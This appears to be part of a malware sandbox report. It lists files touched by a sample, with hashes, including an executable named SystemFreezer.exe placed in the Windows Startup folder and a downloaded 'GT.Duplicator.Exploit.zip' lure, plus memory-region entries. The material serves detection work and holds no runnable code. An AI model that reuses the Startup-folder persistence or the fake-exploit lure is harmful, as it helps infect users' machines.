                                    5KB

                                    MD5

                                    6f530f1f11bf69ff10ee37e799208bc0

                                    SHA1

                                    1f90bb1505616020ca14368bc1162d5e6d68a871

                                    SHA256

                                    fa7fde1d2ddd376a9a65addbc35ab23fe71e8f4f06fe24d9b7a9bd151d8670f5

                                    SHA512

                                    f6afebacfd754739f1e0486fd1666d2b40e2706b6fab96d83cd786c17ca57f86206833e3df2e7a5caafb2aea7f7386274001956a7079bd18d6b50b4593a92d19

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                    Filesize

                                    5KB

                                    MD5

                                    7199eab038c28907bacfecd816d387ee

                                    SHA1

                                    efc8cb53429081ecca1d4284e2ee2a2db6e69c71

                                    SHA256

                                    4c27360601cfcc7cde3522dd490c4878802c10be7587f31dc616483b74227067

                                    SHA512

                                    07c23132e7aed82c0d736f22436a63b06f20e72fd4570ae78d037dcce31358dad205797593f6c008a30e1275332201c191d8064a2857a78e7824dc85d8c6685a

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                    Filesize

                                    24KB

                                    MD5

                                    5a6206a3489650bf4a9c3ce44a428126

                                    SHA1

                                    3137a909ef8b098687ec536c57caa1bacc77224b

                                    SHA256

                                    0a9e623c6df237c02a585539bffb8249de48949c6d074fe0aaf43063731a3e28

                                    SHA512

                                    980da83c3142bf08433ec1770a2ec5f5560daf3ee680466f89beae8290e921c0db677489daad055fbc1f196388f8bc4f60e050600381f860b06d330062440a78

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                    Filesize

                                    16B

                                    MD5

                                    6752a1d65b201c13b62ea44016eb221f

                                    SHA1

                                    58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                    SHA256

                                    0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                    SHA512

                                    9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                    Filesize

                                    10KB

                                    MD5

                                    3360cb9430c3e9491d08df94ce7aa18b

                                    SHA1

                                    7dfc1554ec47ab9a472d47e77baf064a371860b7

                                    SHA256

                                    9ddf1048c52129818182bf4d8150ac4c3e3845d08d6dce9b1350256216ac33fe

                                    SHA512

                                    ebca653f018925b6333923272f1f0c6aea41c4c08619c7e2a1d401b7cfa317b61f9516db8b81cba5c3d060659f3ab7f2c71205f9a782d98c9b6aec2171b43e3f

                                  • C:\Users\Admin\AppData\Local\Temp\dcd.exe

                                    Filesize

                                    227KB

                                    MD5

                                    b5ac46e446cead89892628f30a253a06

                                    SHA1

                                    f4ad1044a7f77a1b02155c3a355a1bb4177076ca

                                    SHA256

                                    def7afcb65126c4b04a7cbf08c693f357a707aa99858cac09a8d5e65f3177669

                                    SHA512

                                    bcabbac6f75c1d41364406db457c62f5135a78f763f6db08c1626f485c64db4d9ba3b3c8bc0b5508d917e445fd220ffa66ebc35221bd06560446c109818e8e87

                                  • C:\Users\Admin\AppData\Local\Temp\dcd.exe

                                    Filesize

                                    227KB

                                    MD5

                                    b5ac46e446cead89892628f30a253a06

                                    SHA1

                                    f4ad1044a7f77a1b02155c3a355a1bb4177076ca

                                    SHA256

                                    def7afcb65126c4b04a7cbf08c693f357a707aa99858cac09a8d5e65f3177669

                                    SHA512

                                    bcabbac6f75c1d41364406db457c62f5135a78f763f6db08c1626f485c64db4d9ba3b3c8bc0b5508d917e445fd220ffa66ebc35221bd06560446c109818e8e87

                                  • C:\Users\Admin\AppData\Local\Temp\dcd.exe

                                    Filesize

                                    227KB

                                    MD5

                                    b5ac46e446cead89892628f30a253a06

                                    SHA1

                                    f4ad1044a7f77a1b02155c3a355a1bb4177076ca

                                    SHA256

                                    def7afcb65126c4b04a7cbf08c693f357a707aa99858cac09a8d5e65f3177669

                                    SHA512

                                    bcabbac6f75c1d41364406db457c62f5135a78f763f6db08c1626f485c64db4d9ba3b3c8bc0b5508d917e445fd220ffa66ebc35221bd06560446c109818e8e87

                                  • C:\Users\Admin\AppData\Local\Temp\dcd.exe

                                    Filesize

                                    227KB

                                    MD5

                                    b5ac46e446cead89892628f30a253a06

                                    SHA1

                                    f4ad1044a7f77a1b02155c3a355a1bb4177076ca

                                    SHA256

                                    def7afcb65126c4b04a7cbf08c693f357a707aa99858cac09a8d5e65f3177669

                                    SHA512

                                    bcabbac6f75c1d41364406db457c62f5135a78f763f6db08c1626f485c64db4d9ba3b3c8bc0b5508d917e445fd220ffa66ebc35221bd06560446c109818e8e87

                                  • C:\Users\Admin\AppData\Local\Temp\dcd.exe

                                    Filesize

                                    227KB

                                    MD5

                                    b5ac46e446cead89892628f30a253a06

                                    SHA1

                                    f4ad1044a7f77a1b02155c3a355a1bb4177076ca

                                    SHA256

                                    def7afcb65126c4b04a7cbf08c693f357a707aa99858cac09a8d5e65f3177669

                                    SHA512

                                    bcabbac6f75c1d41364406db457c62f5135a78f763f6db08c1626f485c64db4d9ba3b3c8bc0b5508d917e445fd220ffa66ebc35221bd06560446c109818e8e87

                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemFreezer.exe

                                    Filesize

                                    884KB

                                    MD5

                                    c535be7d5fca25b986c17ff8dda9d482

                                    SHA1

                                    99199849ab5140e0df64083ae70c9b65265308f7

                                    SHA256

                                    07cc4f727bac2537a45421540107751df24bb736d6e471d90f84e73366e111e0

                                    SHA512

                                    c7ac6268ce848f7137e9c31407abbad528f0129d1c436c831b79ca30ec304ebd7da0d94fe70128be3c3c383edb85b59c9a546e8e64e6cec11be414c7bd4159c2

                                  • C:\Users\Admin\Downloads\GT.Duplicator.Exploit.zip

                                    Filesize

                                    607KB

                                    MD5

                                    19f3b40baf7953f2068ec3f148a2c1aa

                                    SHA1

                                    d7c9d9307d317177d7b8f394b838e57f0157bbc5

                                    SHA256

                                    3064f41531487ee3b9205367940d50ab150775008c1ff13b92069cbbbb828e1f

                                    SHA512

                                    364b8b24cef388466d5365d7a6a738082770e4be648d1de3745df346ebabcf838749f16dfe647133550e5922c90ee5fe464e3528691a7e05bdcc55a379bde6c0

                                  • memory/628-181-0x00007FF8D8270000-0x00007FF8D8D31000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/628-176-0x000000001B980000-0x000000001B990000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/628-175-0x000000001B980000-0x000000001B990000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/628-174-0x000000001B980000-0x000000001B990000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/628-173-0x0000000001440000-0x0000000001441000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/628-172-0x00007FF8D8270000-0x00007FF8D8D31000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/2292-111-0x000000001B770000-0x000000001B780000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/2292-105-0x0000000002B60000-0x0000000002BB0000-memory.dmp

                                    Filesize

                                    320KB

                                  • memory/2292-106-0x0000000001260000-0x0000000001261000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/2292-107-0x0000000001260000-0x0000000001261000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/2292-108-0x000000001B770000-0x000000001B780000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/2292-109-0x0000000002BB0000-0x0000000002BEE000-memory.dmp

                                    Filesize

                                    248KB

                                  • memory/2292-110-0x000000001B770000-0x000000001B780000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/2292-120-0x00007FF8D8680000-0x00007FF8D9141000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/2292-103-0x0000000000990000-0x0000000000A76000-memory.dmp

                                    Filesize

                                    920KB

                                  • memory/2292-104-0x00007FF8D8680000-0x00007FF8D9141000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/5084-136-0x0000000000900000-0x0000000000901000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/5084-144-0x00007FF8D8150000-0x00007FF8D8C11000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/5084-134-0x00007FF8D8150000-0x00007FF8D8C11000-memory.dmp

                                    Filesize

                                    10.8MB

                                  • memory/5084-135-0x0000000000900000-0x0000000000901000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/5084-138-0x000000001AD50000-0x000000001AD60000-memory.dmp

                                    Filesize

                                    64KB

                                  • memory/5084-137-0x000000001AD50000-0x000000001AD60000-memory.dmp

                                    Filesize

                                    64KB

                                  We care about your privacy.

                                  This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.